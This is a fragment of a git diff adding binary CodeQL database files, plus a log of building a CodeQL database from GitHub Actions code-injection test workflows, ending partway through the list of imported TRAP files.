z@8^GGTaWkiwZy*@@!?PTwV&TJ&+=aef8U(G&PAQme*Unq`~N0h_4I!Jhs=7A=kIb-8k2V6Fle@v$!TtKibimEx5X TopqiKb15e+`E{fHbItz;K!jeg literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/yaml.rel.checksum b/db/db-yaml/default/yaml.rel.checksum new file mode 100644 index 0000000000000000000000000000000000000000..de6f34140970bfaacb1acf652a352d65a8f5675c GIT binary patch literal 12 ScmZQzU|?hb0{$OcwgLbJRswPW literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/yaml_locations.rel b/db/db-yaml/default/yaml_locations.rel new file mode 100644 index 0000000000000000000000000000000000000000..f46747ec341818ba278ef400b576bde6966ce296 GIT binary patch literal 11128 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 literal 0 HcmV?d00001 
diff --git a/db/db-yaml/default/yaml_scalars.rel b/db/db-yaml/default/yaml_scalars.rel new file mode 100644 index 0000000000000000000000000000000000000000..aa10fbd1a3ab8b089f766b6e623ff699b1dc88ff GIT binary patch literal 12540 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 Initializing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. +[2024-03-01 13:05:58] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:58] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson +[2024-03-01 13:05:58] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/.codeqlmanifest.json +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml/codeql-extractor.yml. 
+[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript/codeql-extractor.yml. +[2024-03-01 13:05:58] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby/codeql-extractor.yml. 
+[2024-03-01 13:05:58] Plumbing command codeql resolve languages completed: + { + "aliases" : { + "c" : "cpp", + "c++" : "cpp", + "c-c++" : "cpp", + "c-cpp" : "cpp", + "c#" : "csharp", + "java-kotlin" : "java", + "kotlin" : "java", + "javascript-typescript" : "javascript", + "typescript" : "javascript" + }, + "extractors" : { + "go" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/go" + } + ], + "python" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/python", + "extractor_options" : { + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Python extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + }, + "python_executable_name" : { + "title" : "Controls the name of the Python executable used by the Python extractor.", + "description" : "The Python extractor uses platform-dependent heuristics to determine the name of the Python executable to use. Specifying a value for this option overrides the name of the Python executable used by the extractor. Accepted values are py, python and python3. 
Use this setting with caution, the Python extractor requires Python 3 to run.\n", + "type" : "string", + "pattern" : "^(py|python|python3)$" + } + } + } + ], + "java" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java", + "extractor_options" : { + "exclude" : { + "title" : "A glob excluding files from analysis.", + "description" : "A glob indicating what files to exclude from the analysis.\n", + "type" : "string" + }, + "add_prefer_source" : { + "title" : "Whether to always prefer source files over class files.", + "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction (experimental).", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. 
Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "html" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html" + } + ], + "xml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml" + } + ], + "properties" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties" + } + ], + "cpp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp", + "extractor_options" : { } + } + ], + "swift" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift" + } + ], + "csv" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv" + } + ], + "yaml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml" + } + ], + "csharp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip|brotli)$" + } + } + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction.", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "cil" : { + "title" : "Whether to enable CIL extraction.", + "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the extractor. 
The supported levels are (in order of increasing verbosity):\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + } + } + } + ], + "javascript" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript", + "extractor_options" : { + "skip_types" : { + "title" : "Skip type extraction for TypeScript", + "description" : "Whether to skip the extraction of types in a TypeScript application", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "ruby" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip)$" + } + } + } + } + } + ] + } + } +[2024-03-01 13:05:58] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 +[2024-03-01 13:05:58] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. 
+[2024-03-01 13:05:58] [DETAILS] database init> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . +[2024-03-01 13:05:58] [PROGRESS] database init> Calculated baseline information for languages: (71ms). +[2024-03-01 13:05:58] [PROGRESS] database init> Resolving extractor yaml. +[2024-03-01 13:05:58] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. +[2024-03-01 13:05:58] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. +[2024-03-01 13:05:58] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. This in-progress database is ready to be populated by an extractor. +[2024-03-01 13:05:58] Plumbing command codeql database init completed. +[2024-03-01 13:05:58] [PROGRESS] database create> Running build command: [] +[2024-03-01 13:05:58] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --index-traceless-dbs --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:58] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh. 
+[2024-03-01 13:05:58] [PROGRESS] database trace-command> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh] +[2024-03-01 13:05:59] [build-stderr] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] [build-stderr] /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] [build-stderr] Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] +[2024-03-01 13:05:59] Plumbing command codeql database trace-command completed. +[2024-03-01 13:05:59] [PROGRESS] database create> Finalizing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. +[2024-03-01 13:05:59] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:59] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db... 
+[2024-03-01 13:05:59] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/yaml.dbscheme -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml +[2024-03-01 13:05:59] Clearing disk cache since the version file /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache/version does not exist +[2024-03-01 13:05:59] Tuple pool not found. Clearing relations with cached strings +[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode clear. +[2024-03-01 13:05:59] Sequence stamp origin is -6212520902965462594 +[2024-03-01 13:05:59] Pausing evaluation to hard-clear memory at sequence stamp o+0 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Pausing evaluation to quickly trim disk at sequence stamp o+1 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+2 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Trimming completed (6ms): Purged everything. 
+[2024-03-01 13:05:59] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml +[2024-03-01 13:05:59] Found 27 TRAP files (71.04 KiB) +[2024-03-01 13:05:59] [PROGRESS] dataset import> Importing TRAP files +[2024-03-01 13:05:59] Importing argus_case_study.yml.trap.gz (1 of 27) +[2024-03-01 13:05:59] Importing changed-files.yml.trap.gz (2 of 27) +[2024-03-01 13:05:59] Importing comment_issue.yml.trap.gz (3 of 27) +[2024-03-01 13:05:59] Importing comment_issue_newline.yml.trap.gz (4 of 27) +[2024-03-01 13:05:59] Importing cross1.yml.trap.gz (5 of 27) +[2024-03-01 13:05:59] Importing cross2.yml.trap.gz (6 of 27) +[2024-03-01 13:05:59] Importing cross3.yml.trap.gz (7 of 27) +[2024-03-01 13:05:59] Importing discussion.yml.trap.gz (8 of 27) +[2024-03-01 13:05:59] Importing discussion_comment.yml.trap.gz (9 of 27) +[2024-03-01 13:05:59] Importing gollum.yml.trap.gz (10 of 27) +[2024-03-01 13:05:59] Importing image_link_generator.yml.trap.gz (11 of 27) +[2024-03-01 13:05:59] Importing inter-job.yml.trap.gz (12 of 27) +[2024-03-01 13:05:59] Importing issues.yaml.trap.gz (13 of 27) +[2024-03-01 13:05:59] Importing matrix.yml.trap.gz (14 of 27) +[2024-03-01 13:05:59] Importing no-flow1.yml.trap.gz (15 of 27) +[2024-03-01 13:05:59] Importing no-flow2.yml.trap.gz (16 of 27) +[2024-03-01 13:05:59] Importing pull_request_review.yml.trap.gz (17 of 27) +[2024-03-01 13:05:59] Importing pull_request_review_comment.yml.trap.gz (18 of 27) +[2024-03-01 13:05:59] Importing pull_request_target.yml.trap.gz (19 of 27) +[2024-03-01 13:05:59] Importing push.yml.trap.gz (20 of 27) +[2024-03-01 13:05:59] Importing simple1.yml.trap.gz (21 of 27) +[2024-03-01 13:05:59] Importing simple2.yml.trap.gz (22 of 27) +[2024-03-01 13:05:59] Importing test.yml.trap.gz (23 of 27) +[2024-03-01 13:05:59] Importing workflow_run.yml.trap.gz (24 of 27) +[2024-03-01 13:05:59] Importing action.yml.trap.gz (25 of 27) +[2024-03-01 13:05:59] Importing action.yml.trap.gz (26 
